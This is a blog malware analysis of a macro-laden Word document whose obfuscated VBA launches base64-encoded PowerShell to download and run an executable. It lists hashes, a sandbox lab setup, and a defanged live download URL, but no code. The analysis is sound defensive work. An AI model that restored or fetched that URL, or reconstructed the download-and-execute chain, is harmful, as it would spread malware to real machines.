Malware Analysis – Microsoft Word (VBA Macro Downloader using PowerShell)

1) Sample Details:

MD5 – 5ab2c99e5b4673494c2b37da10442bc3
SHA-1 – 00d379f6e1d040a185f7c7d678879360a1570b47
SHA-256 – 05e1e27194872ea82491a474afd2273bdad56e2b61172453ef3e771be6965c82

$ file PT798800-TT000768-11.doc
PT798800-TT000768-11.doc: Microsoft Word 2007+

2) Right away we see the suggestion provided to enable macro and a “100% Virus Satisfaction Guaranteed Seal” with a check mark next to ‘No Download’ (seems legit :p).

3) There was a lot of Junk Code like empty variables in the VBA Macro:

did some basic clean-up and got the below code:

4) After further analysis..

becomes..

Setting up a breakpoint on second instance of ‘XSxMDWlQw7O6442qdqr2ktnsz_Jzu__o__YHxzT81ZK4S_AvPvVT’ and executing gives us the below result:

5) So , ‘XSxMDWlQw7O6442qdqr2ktnsz_Jzu__o__YHxzT81ZK4S_AvPvVT’ becomes the below:

which is the same as mentioned below, this malicious script gets executed in the device:

This is base64 Encoded, below is the decoded version:

So, Possibly a PE File will be downloaded from the below link, moved to Temp Folder as TLEWf5fHN4.exe and will be executed

hxxp://tehrenberg[.]com/download[.]php?file=NjU4NjYzNjk3MF9fX19iYWJhbW0uZXhl

6) Tried running the PowerShell script in my Lab and observed the below results

Lab Setup:
Windows 10 – Does not have Internet Connectivity.
REMnux – Is the Default Gateway for W10 and has fakedns and INetSim running.

We get the ‘File or directory is corrupted and unreadable’ as it’s the fake file provided by INetSim.

I was able to download it manually, the downloaded PE File is 569044a286d02a335b7febfe434b1779655bbe54bd872eed6c04ec8eacc78e9f

https://www.virustotal.com/gui/file/569044a286d02a335b7febfe434b1779655bbe54bd872eed6c04ec8eacc78e9f/details

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s